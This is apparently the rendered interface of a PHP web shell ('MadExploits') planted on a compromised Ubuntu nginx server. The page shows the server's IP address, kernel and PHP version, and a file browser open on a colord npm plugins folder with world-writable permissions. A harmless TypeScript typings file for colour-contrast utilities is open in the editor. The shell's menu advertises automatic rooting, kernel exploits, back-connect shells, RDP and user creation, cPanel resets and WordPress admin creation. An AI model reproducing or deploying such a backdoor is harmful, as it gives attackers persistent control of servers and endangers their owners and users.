Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
colord /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
a11y.d.ts
1.58
KB
-rw-rw-rw-
a11y.js
813
B
-rw-rw-rw-
a11y.mjs
812
B
-rw-rw-rw-
cmyk.d.ts
871
B
-rw-rw-rw-
cmyk.js
1.59
KB
-rw-rw-rw-
cmyk.mjs
1.59
KB
-rw-rw-rw-
harmonies.d.ts
602
B
-rw-rw-rw-
harmonies.js
358
B
-rw-rw-rw-
harmonies.mjs
357
B
-rw-rw-rw-
hwb.d.ts
820
B
-rw-rw-rw-
hwb.js
1.8
KB
-rw-rw-rw-
hwb.mjs
1.8
KB
-rw-rw-rw-
lab.d.ts
805
B
-rw-rw-rw-
lab.js
3.08
KB
-rw-rw-rw-
lab.mjs
3.08
KB
-rw-rw-rw-
lch.d.ts
944
B
-rw-rw-rw-
lch.js
2.82
KB
-rw-rw-rw-
lch.mjs
2.82
KB
-rw-rw-rw-
minify.d.ts
528
B
-rw-rw-rw-
minify.js
1.08
KB
-rw-rw-rw-
minify.mjs
1.08
KB
-rw-rw-rw-
mix.d.ts
850
B
-rw-rw-rw-
mix.js
2.05
KB
-rw-rw-rw-
mix.mjs
2.05
KB
-rw-rw-rw-
names.d.ts
631
B
-rw-rw-rw-
names.js
3.45
KB
-rw-rw-rw-
names.mjs
3.45
KB
-rw-rw-rw-
xyz.d.ts
419
B
-rw-rw-rw-
xyz.js
1.49
KB
-rw-rw-rw-
xyz.mjs
1.49
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : a11y.d.ts
import { AnyColor } from "../types"; import { Plugin } from "../extend"; interface ReadabilityOptions { level?: "AA" | "AAA"; size?: "normal" | "large"; } declare module "../colord" { interface Colord { /** * Returns the relative luminance of a color, * normalized to 0 for darkest black and 1 for lightest white. * https://www.w3.org/TR/WCAG20/#relativeluminancedef * https://developer.mozilla.org/en-US/docs/Web/Accessibility/Understanding_Colors_and_Luminance */ luminance(): number; /** * Calculates a contrast ratio for a color pair. * This luminance difference is expressed as a ratio ranging * from 1 (e.g. white on white) to 21 (e.g., black on a white). * WCAG requires a ratio of at least 4.5 for normal text and 3 for large text. * https://www.w3.org/TR/UNDERSTANDING-WCAG20/visual-audio-contrast-contrast.html * https://webaim.org/articles/contrast/ */ contrast(color2?: AnyColor | Colord): number; /** * Checks that a background and text color pair conforms to WCAG 2.0 requirements. * https://www.w3.org/TR/UNDERSTANDING-WCAG20/visual-audio-contrast-contrast.html */ isReadable(color2?: AnyColor | Colord, options?: ReadabilityOptions): boolean; } } /** * A plugin adding accessibility and color contrast utilities. * Follows Web Content Accessibility Guidelines 2.0. * https://www.w3.org/TR/WCAG20/ */ declare const a11yPlugin: Plugin; export default a11yPlugin;
Close